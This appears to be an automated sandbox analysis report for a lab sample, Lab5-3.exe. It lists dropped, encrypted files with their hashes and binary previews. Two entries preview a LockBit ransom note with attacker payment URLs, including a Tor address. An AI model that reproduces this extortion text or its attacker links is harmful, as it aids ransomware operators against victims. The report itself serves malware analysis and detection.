                                                                                                          Preview:................R\.KHB.$?.n..3..E.\.!^..:.o..0._Q..s..}......l....3.\...\....._F..#...9U.xf...y.. U............<..zf.P....S.... |C..5./..6...V.+...p..-..(e1.Fk....d.6......6.1..=..p-...BHjy.k...sk.....L..M.7.E........,G...^..!.?.[Jj..'qOE...G....N..5.]..Cp... J..nML.{n*]...\.H.=W,..y|.$).;.2..[Q-............z.1..6.G.....4C..k......3#k...\&.2.v......a..F3...l..g.Z,.t+...u.Y:F.._....~..@....s..w.|N.......j<.....M.3H..+..s...q... ..........L.-.P98......p%g....9$..&...|....}(`....p..si.Yb?.aBJ...Ivu/n..VD..q...k.LE..C.a.C.....n..T.....c......Y......'...S.G..WC..l3..1V....`..#...../....2-..<3....Xex.....u.$..{.0...............5..H..u....W....l.0.$.......n.2..Q0/..M.."E...f..^.N...y..L..!ag...r...%..U..yVl.......R0%o)n.@.$..o.%.....3......0.n]h.Q+.~2u.'... L.......@ok/.8Eu.8...(.u...c].8.*....Mj.......:..14.]..:...Z#...D....7..J.....X......R....H..h.4.4......[..;6....m.qB.....p$...yJ`..U|.'..?.E......,.,F..y.@l......hl.u...:K..N..[.+.@.U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):169632
                                                                                                          Entropy (8bit):7.998800148323648
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:339yfV1EB6ZbspL8H5y2dZ9YiEy71MpUVU/pG3ePsQwZ:339yd6B6GpCdZ2y7+pUVU/pWMwZ
                                                                                                          MD5:4D4B8555DBDBE54333E7C08CC127BA26
                                                                                                          SHA1:0A4353020671B4A9C309CD1DAE94709A2F7E5F84
                                                                                                          SHA-256:8042BEA3079775300F9D6CEFDE58DFD1E4A46A109D5CD034629836B28043DCEE
                                                                                                          SHA-512:C957E02772276CB6FA2960DF75C9D69D2A728F0DE1A9BB445867E0FADB8FBC26568CC3997CED8A70AD73FEE1E22070F9B6F864F2329BB06AB46E3F1C1CAD7AA0
                                                                                                          Malicious:true
                                                                                                          Preview:./...............2......Xt..P..%.[K.gz_3u...S.S..J0>.UDG...0.[l....f.uw..\...m.*..[....I5..f6..\k.!|...8.M.;:,.L.Ya........m.t...{.o...?...S>p.W....dB..!.X.^.+.2...n...KR*{..JY.8..=...C......p(.'..p.)3.`.....Ob.ki........#.....m.(..%dL..y.~er.E.g.,...._.Fw.j.Z.YNtF...wz.gB>u...N.5.{}'LS...AF...N..C......_4.L.....k.h..+.l...Q..V*.TV.CG/....C...(....pR....V.G9X.....=?..#.H....d..xs.B.k..y.0..U.G....-...[..z.e.F..],......lN.bQ...Q...~?`..:N2......d.....5y..A..ym.............`.Nl}a._E...N.n..6%..4.n.3H..>K.8.W..BK..W7..+...8u7...:.gT..>U...k.*.VJv.....i&{..h.......`......5..$....+...n.d..H.]g.W;...P[...zwO.b..p.->..b...4...r.6.j.P.u....G....|.k.".V. ..G..\%..u.nK .....Q{.l&..,]e..T.?M(.S.>.Pg..........)...u.1so..<..6).......<.....Bk{}...P....ym..\F.O.^.._...B...Sf.y....<.x.... ..}...K3+'Z.VBV...$.........N-X..}.!K.~..I..............0..L...Wb..v.Kzo.X/.;-.^...$.l.2.!.%.x......h6..z..W...J>....e3...4.9.....H.?2Y.. ...*...1/..`.p.u.3A.~ ..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):169584
                                                                                                          Entropy (8bit):7.999046462925966
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:v6ai41VxwZJn1BsxsPmRQ851n7oiNvmfUfDuwPMGPYvZKMIdKVbR+NEmL/Z:vV1Ver1GDQ851ZEMbs8oR27L/Z
                                                                                                          MD5:2D0B7C232671773B7997AE6D01A516C2
                                                                                                          SHA1:B7DD6D4C08ED96BCDBB3E7A1D519CCFC30D71793
                                                                                                          SHA-256:14FAE9CFCC0AC574BB3BB6D9AFC809D84DF997A6BD8070B05A1808A1C5118835
                                                                                                          SHA-512:F35131687890C509D01C212B96358584172A7E4D4E77F4DB6104AFCBCFB059F5977FAD1A03B5C59844831CEC548C5F4293864B8CFE9D334935584280268916A6
                                                                                                          Malicious:true
                                                                                                          Preview:...,s/i.g.]l..%......e.T':m....Q....du.............]..5..zL..*....oNd*...XtD....h...0X..7X.#S.'...`...K...v{-p....D.5.'..>LCa..AD..3....r.hcs.W..A.l;;|..q..(......"..`..y....T..O....^.p)..t..Q.s.U.._..h..V`...U.....-|..NB...:9H[l.y.......s.J.z.D..G..wF.d"<[D~....2.....wJ.q.....#..!.Y3..X.......F....^.......?..;..=.p...Gw..L..cK[$.=u.4..m]...%.|`...I.Y................0y.D@.G.?>n:...hB~..."..3..z...:....Qd.B}`...3.5...}...,.g.^.y....f5.tg.....I{.<..@./... C.x....:e.x.2y....R.}.k..X,.r.!Psy.d)H.M.(.2.9...xG...i_".U.b....]......H.8P,Uz..V..-$N..&..T..4..L..q$/..6..h...Y.x.$..".e.Q..U:..@..T.....G.Mw?5.......(U.....z.J.k.#.e...1 :.H.\...N.....Iy..$...Z..15..C..c.Lda/.>.-..u...........Cs.m_.N.%Wrj..m........./.g..0Fm..a...Nh.:jW...W.o.<.....l..-..T....i.U.5^c..a.j..?F.t.I*......E.....5`.P..-(.i.|.)P*.x4......l.uFF.)S..9...<t ^D.B2h....9_.._.....~)ay|3....$.].i..i.pm.&..8m........{...........z.*....\...=.+O)L....Q+..\L&...;.9Y..<dz.w.... hq..,.`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98688
                                                                                                          Entropy (8bit):7.998123335327945
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:+1t/Q41YTNZEkMaJUoiFkbuE+1ob8HJOpZ:+DjYTNZED9VkSE+1NHJOpZ
                                                                                                          MD5:8D6A5EA6AC16E45AAA5F8882FEC37446
                                                                                                          SHA1:7C68521EB06546147647047ADF15E68A136E84AB
                                                                                                          SHA-256:0B6362B75D5BD085EE5E165C698398F5C76104A7A5B7F963A93F1D0F269AA6D1
                                                                                                          SHA-512:435446671F9ABE76C88CC05F3BA73CFAD9EF946AB4B82271411060E89AE47470B2073B5E72F735117AF89D8FE17E9DBC8912F17DA04E268437E658FB11F5D8E4
                                                                                                          Malicious:true
                                                                                                          Preview:..B......v.#d......$M.}Z..;....ZS....`.~$.......h......e......^?E._./...J..vf\'.DC..J5.".{..-...]...<|.1..p1.P@......%... ...D...P.Bm..{Zlw..i..e..L.;.j.3O.9.K.5.(Y..6.@;=.n...2.._...Y..d......H...EZ*...+..@.!.Pz..r.&g.y..g2[4...%`.dC.\..W.!.n..Uo...$.....J.5.%..psx..U.J.t.....v.G..8.1W.....*._..c.....SA5..4.c..$#.....L..W...r=)..[z2.B..s.e.$.m^.........L.t.O..6.6.(qb...l..!.+...2.&2...E`I.....K...c.L...$.....%.B8}..]..?.Iv[.|.....[.|....}..'9...?hh.....Oqm..qv.....~7Y..y..a.....e..|..@..4lgz...:3,.@?.L:XC()..J.......uZq...Z..W.y~[..f.......<..K...M.."...%....*(A.hN..+..6.6.......V=Z..."a.e..(..q.a ...].F.^......|.........ExYHf8........Y..~.A..2xue............5....\.....a...DJ .........y...c....]Z.X.G.f.K0....q\....~..{...k.....J.....m..w!.(:Upj..y...3..s.>rl..+.:B..IV..(@..az`q........70..y..3..\}C.^...Q...Q..-U.....P.J.b\.,..YW:..'..I\.GQ._..Y..f..r......^R..q...-...KD.......v.]...uO9...'.-...Y.P......0.....(...L.F.2,...........o..o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):95280
                                                                                                          Entropy (8bit):7.9977365200397275
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:m63+nHVGe17ZygEeyzAKmaJlYvkO1gZq8hp+O4fZofayCFcfX9eXG/jcTrQSj1/e:mHnHV5qVeJ3GqH1cJh8f4a1yCCc/QSNe
                                                                                                          MD5:458E4FE599C86C9923EBCC5D77DFF455
                                                                                                          SHA1:B91882D70916E82902346488584009A0FC219846
                                                                                                          SHA-256:5C1DDACF3B5A7DD2D6EB13207655278393213A64D7C6131321A6FED30ADA49F6
                                                                                                          SHA-512:C3C1E9898C39554C56502EB052208297096106BA8F001352F5637A56815A94430AB6287136436FF2CA3A84298BF1D1AAFC8AB17EDE816390BBBC6981A87BB5E9
                                                                                                          Malicious:true
                                                                                                          Preview:^....z.M.P.z...0o4.^..l.{..CQ...e_R/.]an.;....~I.6.du.Ih.j4rX./...I.8....o.R.L.W[..M.=.m\].O..,W.nL.1QM.Gqx*.....4...f .c:E.M2|vM.z.=ej.5...N.....da....,JS..$...xorN.?..B..~...0..z.0..^2..8.....$...J.N.y.$`.`..{..a.......J!`...E..K.#.y..V....m$.V.X.z....2t...U...Ld..B....-..z.."7X-.Qd...K.g.=Z.......P.r.._i.....KV.T...M7%guUD.7.IC..H...G...@..5.\..?-p.v#...-Ih.y..6..FT/hK....25....X...W{..bzcH.N....:.........("K2F(Gt{?)..?0....0.3..(.r~W7.....1.....|...Y.......aM..|..@.0...I....1....9..V.B.R.....b.........:$...6*..f....H.{dE\.*.........Y..V..7.`uGh.%v.d.....I..TU...E..y..n.a.?m8..'.......A.L<a.....O..@.7?.R$[...}...a.G..'.h.E.g{...H^?....yL...~.|.nF.. ....V....H.L.4...[..%..1}yY7...........s[...4...s......As.G...E....:..........dg.`.6.2...,V......j..F>T:.Q.j.4hO.$Ki....4..W..<...0..<.Z./..'.Q84..`.S..&//R..lG}.K.tmy........a..j..p...S......G../.?.......Q.`q.}....W.Gm+...N....e^r]R...UG.Af.S./..{.W.....|:.tUUino..Y!...-.c.|....}.Say$=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98624
                                                                                                          Entropy (8bit):7.998327939069536
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:slIRChnrYSQhCxVpG835ZV102Hm0HJ+gkXl1H8SETZ:zEhrrQhCxu83N22Hm0p+RXLXmZ
                                                                                                          MD5:B37F4CEBF8E4AD6A1C6EB1D0D0B18D3E
                                                                                                          SHA1:60A66AF1D909C59356333AD21799612194A1BD76
                                                                                                          SHA-256:BCC144F121CE657B123B8A44D4C16FE47C2C0318365CBC932A50C65055F1E34D
                                                                                                          SHA-512:D85058D833AA68E59F49FEE0CB68ECFE7C081A42D4AE4549755CEA4B3B163204070A94622B2502D28C25FA2B75251828D708E3F556465C05F80C4112609B3A6A
                                                                                                          Malicious:true
                                                                                                          Preview:u..`^..p..".Fs....5B.0P. .s...N+.4...N.K...x.5;..~{]..?.m..x...4.ty:..xn....6FM3...`Y...@QV2]..=LD...g..5.T_..__...3..] ....e....../]|.&....)..M...i"...n.SQ..m......!$.@*d9`.K.u.....V.5..T.....E..p.MF\hQm.Jqd..X.N@.T.....c..V.J...Y.(w.f.h.^%.m...../.k.P.x..:N......b..%.(~.[....A...o....~K..+..i+...g-..E..1.m[1'...|.p....c.+.0...x_..Bz.......Uw....+cB..$:.u..y.-.".F..I@.q......2...e`...O........I......T6F.ZF.....J.xoB..&X...Xo.....y..#+.H....cSe.%)v...TqR...>........#.O.r...s....Zc2...C1%..Ab..".K.=.gQ.Y..HR..."|...A ..Y. ....h.D......I.^...`..J.m.....D0K..'.,...?m..Zw.xo.#..f.,...F...;E.....9...[nZ..k.qaX....mV.....e{...t......M.c..|..Ra.....e4.D..f.."a{B1..{-..#.}i.9u.@.*y.<.n...W..hP...%../...!6.~K2z<.zF.nD.y..,[.....G........hp..:...n.].j.4..k,.M...xp..z....%'~F%..~I3C.q5K..v .n.>..hA.+.ZL1..6..x...5.y...w..8......j.pC.Z{..y.g.....l........U=............p...(...<.Rk..y.e..J...W...~!....K-*h...7Z..xj@........."|...(...`..t.}.q0..>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):98848
                                                                                                          Entropy (8bit):7.998003114821861
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:1RUNmPHRKa+a2TA42YjrghZUirmrRjFEPaCZ:1KNkRKa+tU42Yjcnmlju3Z
                                                                                                          MD5:8E73573026A1963C7895A4B55A89DA18
                                                                                                          SHA1:6C07EB3EF715567766BBD69A1B706CCE4E7909AD
                                                                                                          SHA-256:E60091D46B80C23E7E7CCBA1A53E52EE57D3B8F57C9F16EB951F73578947E554
                                                                                                          SHA-512:043314AA14EC4F61502289989EE4A4DC29CE146E40061C9A78CEA70E460255154007E7F8D5C23D886EBD169189715A4E1A2DC5969ACA471D880AF41B46D85BEF
                                                                                                          Malicious:true
                                                                                                          Preview:R..=........X........q.F58@.b...!..L=9j.>"...B=M3N\..m....y.V5..=.5..F.[....!...]1nK...4fo.r..-..?..").<..Z.\...C..7....vS7E..T....... .Q..F........^V..43..{..p.E A5%.'I..rPhY.2`.5..\g..y........rV.M.b....v...F-Au,...0&.Nr.%......"....bRcu}....F....T.....K.T./.m..w..>;.jP.sxZ/(..6...=*FD.]`...h.}.. c.'..V/...j?.>..43~.$A.r.k.c.r,.gqhW.....b...........c.4..-..........'..0l..'.....Wt....I....%...|.\...ww......Z.\.{.Y._E.R.}.O..8..L.{.z4..Zd.*.~..:..(o..2.....`.M$X.'|L..OX.:........-1...- .*Gj#>J..JU.-MT..,.b...@Q...$h..Z....(.n.9ZNr...A%w....9]..B.#.@?..8.X.e..c}N}.J..X...t0..#(.wM|..s.....`z.3l.......!"_.^.`..i...(.m@...._)...a.,....Y...`%........%m@U V...R.N..^f/E.x...(..i:...../]...+Hku...........@$.~N&..o..Qw..e\Wg.:.....h5..,/.<....%h...@w".i.h...~..i9..o...x..DKH.....%....]g..s.m.g+o+Ci1.?Nt.}....z..B.g|.ZT..H|m.|.`...>..V...KU.<..#6..S...P.; ..x...g....5..{..@.f.!.q$.y.8.][.........|....3.EY...4.U.@T....y..*HU..._..;..&....R.lP(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3168
                                                                                                          Entropy (8bit):7.9379409513974695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:NartrAZAQCU8jgs3B0E5rCEKN0eFGx0uKeY2ElUJ:GrAZAQCU4VB0IWEKNk0Cb
                                                                                                          MD5:7EE837B24DCC46B1DE7433D822A59EB3
                                                                                                          SHA1:92789BD55A0E76D47F32AA4B06C76BEB39194E94
                                                                                                          SHA-256:D3BA30FB6C2F139D7EE261CAB39A00635A0C3BD7B7C04956D1569CDA5F3638D6
                                                                                                          SHA-512:44346CEE8C286852E15BF743DD894534D362EBB32C285463AEF172C37051125CCFF8CDFD74F90A5B0FD9666A856E8D7E30E03E35BF15BF9C597B4A2CB7B95BFF
                                                                                                          Malicious:false
                                                                                                          Preview:.t.9......GP...9....D$T... .I..""Gg..!..*m..U.._._.w......!F.= .;D3x.M>..P.h..tD.<.(...&.....@.R.u..NG.T.X[n.....c...=>.O....,t.'...R.....RO.c..H...>..7...3...C.|.@..N@..BD..M.Q....iM,M...\3O.....Rm..CW.<...d3.(.....9....d..9Z.\GYM ..8..nj.ps.X... ..i"..C6. .v..>..............l?u7....:...Y.JuPE.%.......S.*..?..t`...n..n......(y.T.../..7..o..Ag......\.37..w.*.*......\h..].Q..F...h].2....T...1...P%...A.WQ:....2G..G9.$'...7=.'..........'-.\..[Y..E{...u$_%%..../.......>..A.]!..:n.==.?..Z..z1Re..Nw...`k.\...Z..&m.C...M...G.t.o..!S.I..R...`...9K..B...K..........7".l,...4..Kxl.......&.^7 6/..S./.>. .8t.b.$.b^SN.{..h7&(.Q.Q.sGw. .z..BM....C........5.3..dj...:V..........^.c..;.r.\4F.Lnw..9.(...EC..G.\$h.....?..<...E.^."/,C....f.P...F.9..!U.T.8. ....9T.../.U"P.^..5.....l...|z..,....2..|.-.._.N.j..........6....?...a]....qe..,.'.. /].c..N..'.J.2..U^....3TT....S^y....aGZAQ.?h%t3CrJ...y.....S..v.=..W..0....b.Ef.i#.R2I.>,......,c..m..H2.....y..!.......sl..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3712
                                                                                                          Entropy (8bit):7.955176049323721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:eJbmdYkyJSoRrvDJ5oB+N++xvmIlNtGfGx0uKeY2ElUJ:SmdYpooj5os++xVx0Cb
                                                                                                          MD5:5DDF15954B9A70E615822EA426C91A16
                                                                                                          SHA1:AC0ED4A10811B421808D1C3D3E1990CCBD851F35
                                                                                                          SHA-256:0DE7D4714C5D17624EB0FB84D5426D0EE9170BE9B0ADD8FB29EB503070D210E6
                                                                                                          SHA-512:AE4671FF2A44A29528DA4985D2025D50B977B6066667D8AD0380C16EA3E778160CB8F7B3EE5229EFE134136FB4790B3626F170F9211A764A5F227832BEB21231
                                                                                                          Malicious:false
                                                                                                          Preview:.U....-<...|.l...........M...Z...6<.........S..L.[..+.&..K9.........K~.l[@T#1...W...%...>.\.2~.2......2...$........M...!L.U2..%....^r.....P. |.....A..AsV...p.s5{.*...d37a...%.p.....@........)j.N.f..!...;.41..U]..1.b.....Q.(...i?.F.0..........|.].>v%..<.=.L1.;......J..vK...(".=...Z.kZ.V.l.H.....z...?........p...;......R\a....n..m...H].h.e.j...4....M..O4.B...p$E.r5.....x..GC.X..z..M........^x]....f..!I...,*.....F.........3Js@'.#1... +^QN.R.+J...w....R..S........c...XGr.'._.lU..1.6T..r.7...O...{q....F...:..@:...{.2_..........K:....b.....}.Yn..4.C5.8-..Xc.y..6.S.W..T..ODZ;Q>F...Z..:. ..g.:..O.7..Td...l..'..W.%\.~W3c...mnM...r.{Q...........jY.1....V..pbD|.w$.YPv..5j'${...tArX...$..~.....-...qlx.m:q.....*..j......=C....'....a.{Dp..Y5Xb..k.e..A..&.m.~&.^.b.X.g..b.....}.U.....qo=.[..e...].v.s..m..~P.B..*..Ow.T..l....f...m..s.g.:.r..Ct..^..~}.t..0d....s%n?V.{..d,)5.Uv*.N,...J:>. D... .*M...!..et.rA.......a'.:.H.X...|p....(.....]..z.:.h1.H..H.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.942949285955753
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:4VyfvEveahDe2jrF47k5RMJyGx0uKeY2ElUJ:4CroDecK7oRWx0Cb
                                                                                                          MD5:80DBE90611AF63E2AC409E975391B32D
                                                                                                          SHA1:80A58E542014DDD57E28B7A2E4BE4AC9C44B41D0
                                                                                                          SHA-256:34AAFD9396F5130A463BDA53143BE20897D1CA48EF191B1139EBFD418E87DD5C
                                                                                                          SHA-512:F57DF8C5B3345B78434610C7472727F0B82D9C3DAD711017018EFDDD297F6B46961ABCE6A7318BA762968DFC799710C923A3B071B858728DC4964785DC203830
                                                                                                          Malicious:false
                                                                                                          Preview:X.g!Pzh..*Ff).r.d.....H..dd.........AR#...........=z......M....m(./....K_ ...."..m<..v..X..7....?.......yF..`./......3M8.g..hk.6.*.[ea.....y..}:....j...yA#.#..*crA...uz.4.[kY.]#.g.3.j|....T7....e[.~..V.....x)....b.%D..f<F..fWE"Z...a.......mE.`-.u..g.P..i.^."U....~.Y..-...l....Da$0.......F`}.V.,..B.X..C.(v.N...;.+|.:..B..Gut..eB..13.K8<'$.'.S.OhB<.O.....nJQ^..{."i..J..C..*.}..[.....B\..)....<.No..@7SP.....B~.#.7... P..ov.9R..U...o.n)..L...b...%j?.4......6.......B..B...^7.....j...$.lC*.7...E...O....y#...`<.BsOH..J.cb|C%<.2..g..%Q.%..g...?Y......GJ...;..R+..IxN.I.A]T.$.../..emX..;.e.p...t.$n.Zd..}%b..u.#.}.@....$.....'F..s.P.WXX>...{.z..E......A....|tk...<...>/|.9.J.HU...'}wr].m5i.G~.k.....H....@..*o..2.e(.~.'.a..%..:....C.wN?....q..l...G.w..'...&.<N........~.'g.k..gM(..s.(:^|d..8.>.I.'KQ..."..3..".~....IL.!.9.<....{.dG..m9mJ..g&<.N..r.."=...f.U.y....<l[.y3lG..${>.a..?..{t.'.H.D...EMR1..._dR......d..>V..M..mF4...{x..%$Y..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3616
                                                                                                          Entropy (8bit):7.95067929847982
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:QIEAVeJwKalF/zNSBuYFbjOj31TzdCuGx0uKeY2ElUJ:QzAKa/zNSB5FyZzdI0Cb
                                                                                                          MD5:09EF2E1716E60D6283258E46DA195890
                                                                                                          SHA1:C5C8FFEEF422EFF932F616F4A48FB6E5F0C9FD9D
                                                                                                          SHA-256:2A439894957CF875A3C1694EE7F8EF6A061EFD2EB2F293D80D3C57EACAB51548
                                                                                                          SHA-512:E406C9B33EF91B59275B30EE7C2F8F7B157DC3D22BE9665DD06411A897F6A7A24BEA7D9A53CCF981C85558D11B99834DDEA336728511D0E362B1A3F56821244D
                                                                                                          Malicious:false
                                                                                                          Preview:..#.!...l...9B.....T.Z<..B...u.0.D..8N.=........a.E..'..V...4l.q..&.@H...+....v.'..I.]....)..t..N.g8.....IG...l./H/..pp,R...n.U..t.f...xn!.%.O|..#...Ke.*l..A.;..n...2..V.~.X>{..g..Y.PM.(=..l.#!Fb.m.M.&{....5.l..*7+.2...)....\w..0...$.....;..U.M...E:.3.).'a....z.Q....CB{J..q.....d.pu.X@F..Ce.K..i$./...v.&..iB{a+..=....Rz..(^...X.Bq....;........`.U........*..Rp.O>..%....LuA....x(m$c)D...Z....<....T.Twsi.~8...eL..w......g..e.:.xS.#..U.......4y....._e2.].Ei.C.`N?..*.r.A..4./!K.}.$K......W........._.)..Y.^...........?5......r$DC|L....A.;.. ."q..h|...^fs.7......q...{..SU[.L..~{x!.Ve.... ...Ld.... ..A.|.u._+zS[.....A*.o.*...).f...v.%.lT...X<...1..r.p..~./C.n4o..)...c.[./8_.-j..K....xU.b.....l...7..hoP.ek..x.m.@.^.h.<2aO.c..u8.....4w.......V.....G..a..A..y.$...|t.R+Q...!......p.9.A.h+^U....iD/.v.^Y..Q-7lv..(.{.;...... v..t.*,.../.?........;.5ld...0q......;]P.\..]S...D.o.sV$>.....x.%c....8]e..0.a.....^.-.....8.%._.....{,|.2..\'..g..$.N..0.j...X|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2304
                                                                                                          Entropy (8bit):7.924081392515735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bx75zMO+QEfCHfUTid3hBaUoSGFcmeykEdEElU92i:bMfGx0uKeY2ElUJ
                                                                                                          MD5:0BAA7CD02CD14EBADEC8331C8DB67E28
                                                                                                          SHA1:B6A9E93C4737A4FA51CA86D96607A5877C68ADE3
                                                                                                          SHA-256:25B5D4110953C819189BCD9A0F34543F634CE998C5BBE3E2D821A1F78A71225D
                                                                                                          SHA-512:CFCB266B193917910696F81C268C9C87CC1E910FDE5E4FFE80872FC940527942ADC9ACA24546DB36CD0514E48EBCEFE8893417DBF78A3645289506908895E9D3
                                                                                                          Malicious:false
                                                                                                          Preview:..........W4g..\G>....1p.h.U.L....z..Rj.7q._.).!..O......U),....G..T"*..r..Fur.F..$..M.&.*C./.\s.U....L....m|"..`.f.....v...y~..J9l!v.(d..l([..z.3.7..fS..dI........D...SD...e.{....q....A...q...X..CG.d.......}..5.....h.A.....qRi..U...a.... 6{.r,2#.^.A9.d.LS.a...I...Y.H...^K....p].2v...u...uF.j.k...XK..6g"a.........W.b....2.t.p.9..d..&O..m`....lQ.5_.,(Y.u...cy.u..6.`AJW.)6x..,8G..;.......q.^.0."#xn.E.........?s.k....u...29.W`.\...0.U.A..i.\...o+HO.......U....R.:.......%..y..\...6....j...f..I......K-...^Yi.h.X..H.'...$"Xq..P.....a... %d.c..l..a.\..xG..4....%..Y.p..%...$5v..K..(.$~J^h.l...<.2.a/U[!l..u...#... .a.....];C-q&.V.e..$.Db>....$c....H>.'.N..p|...&G.*.j^..QR.j:......<%......)dG.B..w.....hq.t;A..CHq...#.g..}.s...}..%h...L..T?..v..6...F....p.z(..CGr.....0S,.k..).w/......DG....b...!d.-..:...>.k+....M3.G.j..k(.@.]..X....m....z..W.n.,.....'.+...v...?=k.M!x<[j...S....&.`....u.n'......./..qq...-F..!....M..O....9.s|k.k.......lR..L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.91030250104335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:69atWUXBcyyvMRztT1Icqwr+AdWHfUTid3hBaUoSGFcmeykEdEElU92i:MfURxKMRzR1Icqwr1dpGx0uKeY2ElUJ
                                                                                                          MD5:ACBE35603500AD80B109909D3AD146FC
                                                                                                          SHA1:0FF3E59CA5935C1B6EA5CDE489038366A6E54F47
                                                                                                          SHA-256:E4B14CEE081513ACB3F4983FC635020644BB6947C4A642DD21CF170875A9B2AA
                                                                                                          SHA-512:B3536437E687FDEFA0B12549D4555A4B2E1321D9DD310AACAF030540FBB9962E94767CB726E2ACD7B53F9E00FBEEF4A8F7B32CA622E863EBC201A0465709D4AF
                                                                                                          Malicious:false
